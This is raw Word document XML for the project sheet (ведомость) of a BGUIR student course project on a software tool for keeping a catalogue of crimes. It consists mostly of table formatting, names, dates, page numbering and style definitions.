          <w:p w14:paraId="604481F7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2CE9C01A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D086E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778CC7B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04973B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94B7B3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E7B5FE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7E1A7B60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8FC120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E72CD59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3FC2D86E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F5B992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5DDCE610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F35DB57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153CD1DC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594BA895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468F36CB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E87EB92" w14:textId="77777777" w:rsidTr="003A1E0F">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3780" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w14:paraId="502C9164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58D27BAC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DDF673A" w14:textId="77777777" w:rsidR="00450B31" w:rsidRPr="004F5C3A" w:rsidRDefault="00450B31" w:rsidP="004F5C3A">
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:spacing w:before="0" w:after="0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3830B800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5F650F29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430390E7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7ADAD52A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F42740F" w14:textId="77777777" w:rsidTr="003A1E0F">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3780" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="400FA8B3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 w14:paraId="33C7A68E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 w14:paraId="0D4D7306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76691E50" w14:textId="77777777" w:rsidTr="003A1E0F">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3780" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w14:paraId="636B5D35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28E39A8A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3EAC6345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585D5FA7" w14:textId="77777777" w:rsidTr="003A1E0F">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3780" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w14:paraId="39BCD182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1BBE382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6B7DE8EB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628387B8" w14:textId="77777777" w:rsidTr="003A1E0F">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="254"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3780" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w14:paraId="112B733F" w14:textId="77777777" w:rsidR="00450B31" w:rsidRDefault="00450B31" w:rsidP="004F5C3A"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 w14:paraId="4AF0E8BD" w14:textId="77777777" w:rsidR="00450B31" w:rsidRPr="004F5C3A" w:rsidRDefault="00450B31" w:rsidP="004F5C3A"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 w14:paraId="171D84FC" w14:textId="77777777" w:rsidR="00450B31" w:rsidRPr="004F5C3A" w:rsidRDefault="00450B31" w:rsidP="004F5C3A">
            <w:pPr>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00450B31" w14:paraId="270FEFC5" w14:textId="77777777" w:rsidTr="003A1E0F">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="644" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AFA8551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27D96EB6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5B790060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4C104EE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8B08ABA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</w:tcPr>
          <w:p w14:paraId="17C6D6FE" w14:textId="77777777" w:rsidR="00450B31" w:rsidRPr="004F5C3A" w:rsidRDefault="00450B31" w:rsidP="004F5C3A">
            <w:pPr>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:right="175"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="42328472" w14:textId="77777777" w:rsidR="00450B31" w:rsidRPr="004F5C3A" w:rsidRDefault="00450B31" w:rsidP="004F5C3A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4F5C3A">
              <w:rPr>
                <w:b w:val="0"/>
                <w:iCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="12"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>БГУИР КП 1-40 01 01 </w:t>
            </w:r>
            <w:r w:rsidR="002A2B96" w:rsidRPr="004F5C3A">
              <w:rPr>
                <w:b w:val="0"/>
                <w:iCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="12"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidR="001A0DA7">
              <w:rPr>
                <w:b w:val="0"/>
                <w:iCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="12"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidRPr="004F5C3A">
              <w:rPr>
                <w:b w:val="0"/>
                <w:iCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="12"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="004F5C3A">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Д1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00450B31" w14:paraId="7964FF19" w14:textId="77777777" w:rsidTr="003A1E0F">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="644" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="296E10B0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 w14:paraId="7E830BA5" w14:textId="77777777" w:rsidR="00450B31" w:rsidRDefault="00450B31" w:rsidP="004F5C3A"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1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0462C5BC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1010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C487C76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720" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63DB996D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</w:tcPr>
          <w:p w14:paraId="7A99CD46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24A5FDEA" w14:textId="77777777" w:rsidTr="003A1E0F">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="644" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="329B47E9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14:paraId="0A2289CB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6A0CE38C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 w14:paraId="0B82518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 w14:paraId="217F199D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</w:tcPr>
          <w:p w14:paraId="240666E4" w14:textId="77777777" w:rsidR="00450B31" w:rsidRPr="004F5C3A" w:rsidRDefault="00450B31" w:rsidP="004F5C3A">
            <w:pPr>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:right="175"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00450B31" w14:paraId="00E76435" w14:textId="77777777" w:rsidTr="003A1E0F">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="262"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="644" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F0ABF9F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567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A65E06C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</w:tcPr>
          <w:p w14:paraId="215F68C7" w14:textId="77777777" w:rsidR="00450B31" w:rsidRDefault="00450B31" w:rsidP="004F5C3A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10" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64435017" w14:textId="77777777" w:rsidR="00450B31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</w:tcPr>
          <w:p w14:paraId="05646C3C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</w:tcPr>
          <w:p w14:paraId="7898E028" w14:textId="77777777" w:rsidR="00450B31" w:rsidRPr="004F5C3A" w:rsidRDefault="00450B31" w:rsidP="004F5C3A">
            <w:pPr>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1BDC5EBC" w14:textId="77777777" w:rsidR="007137EE" w:rsidRPr="004F5C3A" w:rsidRDefault="007137EE" w:rsidP="004F5C3A">
            <w:pPr>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="39" w:hanging="62"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004F5C3A">
              <w:rPr>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Программное средство </w:t>
            </w:r>
            <w:r w:rsidR="00E07B68" w:rsidRPr="004F5C3A">
              <w:rPr>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">для </w:t>
            </w:r>
            <w:r w:rsidR="00AA3EAE">
              <w:rPr>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ведения каталога преступлений</w:t>
            </w:r>
            <w:r w:rsidR="00D84142" w:rsidRPr="004F5C3A">
              <w:rPr>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="702B240B" w14:textId="77777777" w:rsidR="00450B31" w:rsidRPr="004F5C3A" w:rsidRDefault="00450B31" w:rsidP="004F5C3A">
            <w:pPr>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="39" w:hanging="62"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004F5C3A">
              <w:t xml:space="preserve">Ведомость курсового </w:t>
            </w:r>
            <w:r w:rsidRPr="004F5C3A">
              <w:br/>
              <w:t>проекта</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w14:paraId="42129A5B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 w14:paraId="5EB85F50" w14:textId="77777777" w:rsidR="00450B31" w:rsidRPr="004F5C3A" w:rsidRDefault="00450B31" w:rsidP="004F5C3A"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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1056" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="622D5A20" w14:textId="77777777" w:rsidR="00450B31" w:rsidRPr="004F5C3A" w:rsidRDefault="00450B31" w:rsidP="000B75DC"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 w:rsidRPr="004F5C3A">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Листов</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00450B31" w14:paraId="428313BC" w14:textId="77777777" w:rsidTr="003A1E0F">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="280"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1211" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="47FBEBEB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559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="269665B9" w14:textId="77777777" w:rsidR="00450B31" w:rsidRPr="00B17606" w:rsidRDefault="00B17606" w:rsidP="004F5C3A">
            <w:pPr>
              <w:spacing w:before="0" w:line="24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абоха А.К.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72C936DB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C4A68CB" w14:textId="77777777" w:rsidR="00450B31" w:rsidRPr="004F5C3A" w:rsidRDefault="00AA3EAE" w:rsidP="004F5C3A">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="-108"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07.05</w:t>
            </w:r>
            <w:r w:rsidR="00450B31" w:rsidRPr="004F5C3A">
              <w:rPr>
                <w:spacing w:val="-4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>.1</w:t>
            </w:r>
            <w:r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107" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="3DA309B0" w14:textId="77777777" w:rsidR="00450B31" w:rsidRPr="004F5C3A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83" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32B78BE4" w14:textId="77777777" w:rsidR="00450B31" w:rsidRPr="004F5C3A" w:rsidRDefault="00450B31" w:rsidP="004F5C3A">
            <w:pPr>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004F5C3A"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</w:tcPr>
          <w:p w14:paraId="467E7355" w14:textId="77777777" w:rsidR="00450B31" w:rsidRPr="004F5C3A" w:rsidRDefault="00450B31" w:rsidP="004F5C3A">
            <w:pPr>
              <w:spacing w:before="0" w:line="24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</w:tcPr>
          <w:p w14:paraId="7C1B64FC" w14:textId="77777777" w:rsidR="00450B31" w:rsidRPr="004F5C3A" w:rsidRDefault="00450B31" w:rsidP="004F5C3A">
            <w:pPr>
              <w:spacing w:before="0" w:line="24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 w14:paraId="41FE00F9" w14:textId="77777777" w:rsidR="00450B31" w:rsidRPr="004F5C3A" w:rsidRDefault="004F5C3A" w:rsidP="004F5C3A">
            <w:pPr>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004F5C3A">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>34</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1056" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="487819D0" w14:textId="77777777" w:rsidR="00450B31" w:rsidRPr="004F5C3A" w:rsidRDefault="004F5C3A" w:rsidP="000B75DC">
            <w:pPr>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004F5C3A">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>34</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00450B31" w14:paraId="2E80E16A" w14:textId="77777777" w:rsidTr="003A1E0F">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1211" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="3998DE9A" w14:textId="77777777" w:rsidR="00450B31" w:rsidRDefault="00450B31" w:rsidP="004F5C3A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</w:tcPr>
          <w:p w14:paraId="38A0827A" w14:textId="77777777" w:rsidR="00450B31" w:rsidRPr="00B17606" w:rsidRDefault="00450B31" w:rsidP="00AA3EAE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  <w:r w:rsidRPr="00B17606">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00AA3EAE">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Пуздров</w:t>
            </w:r>
            <w:r w:rsidRPr="00B17606">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00AA3EAE">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>М</w:t>
            </w:r>
            <w:r w:rsidR="004034EE">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="00AA3EAE">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Ю</w:t>
            </w:r>
            <w:r w:rsidRPr="00B17606">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00BA5592" w14:textId="77777777" w:rsidR="00450B31" w:rsidRDefault="00450B31" w:rsidP="004F5C3A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07716DF3" w14:textId="77777777" w:rsidR="00450B31" w:rsidRPr="007919EC" w:rsidRDefault="00AA3EAE" w:rsidP="004F5C3A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7.05</w:t>
            </w:r>
            <w:r w:rsidRPr="004F5C3A">
              <w:rPr>
                <w:spacing w:val="-4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3107" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="2593C7B1" w14:textId="77777777" w:rsidR="00450B31" w:rsidRDefault="00450B31" w:rsidP="004F5C3A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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="31608A0F" w14:textId="77777777" w:rsidR="00450B31" w:rsidRDefault="00450B31" w:rsidP="004F5C3A">
            <w:pPr>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="39" w:right="176" w:hanging="62"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Кафедра ПОИТ</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F9D3ED9" w14:textId="77777777" w:rsidR="00450B31" w:rsidRDefault="00450B31" w:rsidP="004F5C3A">
            <w:pPr>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:right="175"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">гр. </w:t>
            </w:r>
            <w:r w:rsidR="00B17606">
              <w:t>551001</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00450B31" w14:paraId="02A62B2D" w14:textId="77777777" w:rsidTr="003A1E0F">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1211" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="215461BF" w14:textId="77777777" w:rsidR="00450B31" w:rsidRDefault="00450B31" w:rsidP="000B75DC"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36A5BE" w14:textId="77777777" w:rsidR="00450B31" w:rsidRDefault="00450B31" w:rsidP="000B75DC">
            <w:p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14:paraId="74813D31" w14:textId="77777777" w:rsidR="00450B31" w:rsidRDefault="00450B31" w:rsidP="000B75DC"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14:paraId="1D157278" w14:textId="77777777" w:rsidR="00450B31" w:rsidRDefault="00450B31" w:rsidP="000B75DC"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</w:tcPr>
          <w:p w14:paraId="5AD52E33" w14:textId="77777777" w:rsidR="00450B31" w:rsidRDefault="00450B31" w:rsidP="000B75DC"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</w:tcPr>
          <w:p w14:paraId="3F5A34BE" w14:textId="77777777" w:rsidR="00450B31" w:rsidRDefault="00450B31" w:rsidP="000B75DC">
            <w:pPr>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3BD32222" w14:textId="77777777" w:rsidR="00B0752C" w:rsidRPr="00F50F62" w:rsidRDefault="00B0752C" w:rsidP="000B75D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F50F62" w:rsidSect="00341DEC">
      <w:footerReference w:type="even" r:id="rId18"/>
      <w:footerReference w:type="default" r:id="rId19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6D6F" w14:textId="77777777" w:rsidR="00D03730" w:rsidRDefault="00D0373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5463769E" w14:textId="77777777" w:rsidR="00D03730" w:rsidRDefault="00D0373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Bold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771" w14:textId="24B317BC" w:rsidR="00E942E5" w:rsidRDefault="00E942E5" w:rsidP="00E3478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 w:rsidR="00095ED0">
      <w:rPr>
        <w:rStyle w:val="ad"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00095ED0">
      <w:rPr>
        <w:rStyle w:val="ad"/>
        <w:noProof/>
      </w:rPr>
      <w:t>19</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="ad"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="05DAFD9B" w14:textId="77777777" w:rsidR="00E942E5" w:rsidRDefault="00E942E5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7887"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w14:paraId="54F1B0C2" w14:textId="77777777" w:rsidR="00E942E5" w:rsidRDefault="00E942E5">
        <w:pPr>
          <w:pStyle w:val="a9"/>
          <w:jc w:val="right"/>
        </w:pPr>
        <w:r w:rsidRPr="00AC4E9A">
          <w:rPr>
            <w:sz w:val="22"/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="00AC4E9A">
          <w:rPr>
            <w:sz w:val="22"/>
          </w:rPr>
          <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
        </w:r>
        <w:r w:rsidRPr="00AC4E9A">
          <w:rPr>
            <w:sz w:val="22"/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="001A0DA7">
          <w:rPr>
            <w:noProof/>
            <w:sz w:val="22"/>
          </w:rPr>
          <w:t>21</w:t>
        </w:r>
        <w:r w:rsidRPr="00AC4E9A">
          <w:rPr>
            <w:sz w:val="22"/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="5716F770" w14:textId="77777777" w:rsidR="00E942E5" w:rsidRDefault="00E942E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25F5" w14:textId="77777777" w:rsidR="00D03730" w:rsidRDefault="00D0373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0397A521" w14:textId="77777777" w:rsidR="00D03730" w:rsidRDefault="00D0373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220E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7B5E4BA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9123A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FA96EC96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B4EA8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1C9840EC"/>
    <w:lvl w:ilvl="0" w:tplc="7BBE928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05728C6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5FAA6458"/>
    <w:lvl w:ilvl="0" w:tplc="8FBA4458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16E9E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="464AF254"/>
    <w:lvl w:ilvl="0" w:tplc="7BF2780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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="39EF3429"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A42E02B6"/>
    <w:lvl w:ilvl="0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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3AD54455"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4162CCE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3F7B20"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="99C0F8D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A4356"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E64C9E92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1A680B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5502C6B0"/>
    <w:lvl w:ilvl="0" w:tplc="7BBE9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696"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="27043E42"/>
    <w:lvl w:ilvl="0" w:tplc="4809000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.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584C9F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="89EA5F84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F31F4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3CD8A3EE"/>
    <w:lvl w:ilvl="0" w:tplc="7BBE9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AA2BD4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2AAA18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7342446">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1634676248">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1078940766">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1437948658">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1883321874">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="424881779">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="330722651">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1122186335">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1470631430">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1446726996">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="813110422">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="239828149">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="809908008">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="87905329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BF1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700D7"/>
    <w:rsid w:val="00073E84"/>
    <w:rsid w:val="00077103"/>
    <w:rsid w:val="00081F5C"/>
    <w:rsid w:val="00084174"/>
    <w:rsid w:val="000863CF"/>
    <w:rsid w:val="000875E6"/>
    <w:rsid w:val="00091173"/>
    <w:rsid w:val="00092D40"/>
    <w:rsid w:val="000947AA"/>
    <w:rsid w:val="00094AAB"/>
    <w:rsid w:val="0009596D"/>
    <w:rsid w:val="00095ED0"/>
    <w:rsid w:val="00097B85"/>
    <w:rsid w:val="000A0ADC"/>
    <w:rsid w:val="000A1395"/>
    <w:rsid w:val="000A252D"/>
    <w:rsid w:val="000A25A9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2A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174"/>
    <w:rsid w:val="001B52E2"/>
    <w:rsid w:val="001C17C4"/>
    <w:rsid w:val="001C1C0D"/>
    <w:rsid w:val="001C6CCA"/>
    <w:rsid w:val="001D06EF"/>
    <w:rsid w:val="001D1151"/>
    <w:rsid w:val="001D270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6258"/>
    <w:rsid w:val="002B7CBF"/>
    <w:rsid w:val="002C0B75"/>
    <w:rsid w:val="002C1EBC"/>
    <w:rsid w:val="002C3C9E"/>
    <w:rsid w:val="002C4754"/>
    <w:rsid w:val="002C5008"/>
    <w:rsid w:val="002D160B"/>
    <w:rsid w:val="002D22A8"/>
    <w:rsid w:val="002D451F"/>
    <w:rsid w:val="002D50E7"/>
    <w:rsid w:val="002D5212"/>
    <w:rsid w:val="002D7A0E"/>
    <w:rsid w:val="002E69C2"/>
    <w:rsid w:val="002E7BDD"/>
    <w:rsid w:val="002F0D33"/>
    <w:rsid w:val="002F2968"/>
    <w:rsid w:val="002F2FDC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3847"/>
    <w:rsid w:val="003262C1"/>
    <w:rsid w:val="00326872"/>
    <w:rsid w:val="003304A7"/>
    <w:rsid w:val="00331269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0E26"/>
    <w:rsid w:val="003715A5"/>
    <w:rsid w:val="00372B59"/>
    <w:rsid w:val="00373E15"/>
    <w:rsid w:val="00376DBD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05F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30BF"/>
    <w:rsid w:val="003E530D"/>
    <w:rsid w:val="003E66E3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1E3A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2C74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0D27"/>
    <w:rsid w:val="004C16B8"/>
    <w:rsid w:val="004C1ECD"/>
    <w:rsid w:val="004C3037"/>
    <w:rsid w:val="004C3896"/>
    <w:rsid w:val="004C5832"/>
    <w:rsid w:val="004D4597"/>
    <w:rsid w:val="004D56A5"/>
    <w:rsid w:val="004D5BE8"/>
    <w:rsid w:val="004D61DA"/>
    <w:rsid w:val="004D78D5"/>
    <w:rsid w:val="004D7B79"/>
    <w:rsid w:val="004E184D"/>
    <w:rsid w:val="004E2F8C"/>
    <w:rsid w:val="004F0696"/>
    <w:rsid w:val="004F41A4"/>
    <w:rsid w:val="004F5C3A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4D82"/>
    <w:rsid w:val="0051536F"/>
    <w:rsid w:val="0051618F"/>
    <w:rsid w:val="00516D74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B01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1A74"/>
    <w:rsid w:val="00632952"/>
    <w:rsid w:val="00633147"/>
    <w:rsid w:val="00633157"/>
    <w:rsid w:val="00635197"/>
    <w:rsid w:val="0064173B"/>
    <w:rsid w:val="00641D07"/>
    <w:rsid w:val="00642B86"/>
    <w:rsid w:val="00643129"/>
    <w:rsid w:val="00643FF8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5203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67A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3E0A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09AB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2771"/>
    <w:rsid w:val="008A4BC2"/>
    <w:rsid w:val="008A4D03"/>
    <w:rsid w:val="008A532B"/>
    <w:rsid w:val="008B1C0E"/>
    <w:rsid w:val="008B4C09"/>
    <w:rsid w:val="008C32A0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29E8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148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5C5D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317D"/>
    <w:rsid w:val="00A34012"/>
    <w:rsid w:val="00A36B7D"/>
    <w:rsid w:val="00A400DB"/>
    <w:rsid w:val="00A40B7D"/>
    <w:rsid w:val="00A43423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BA0"/>
    <w:rsid w:val="00AA6CB2"/>
    <w:rsid w:val="00AA776B"/>
    <w:rsid w:val="00AB7819"/>
    <w:rsid w:val="00AB7C86"/>
    <w:rsid w:val="00AC0671"/>
    <w:rsid w:val="00AC2DF3"/>
    <w:rsid w:val="00AC331C"/>
    <w:rsid w:val="00AC4E9A"/>
    <w:rsid w:val="00AC5887"/>
    <w:rsid w:val="00AC7F48"/>
    <w:rsid w:val="00AD268A"/>
    <w:rsid w:val="00AD51D8"/>
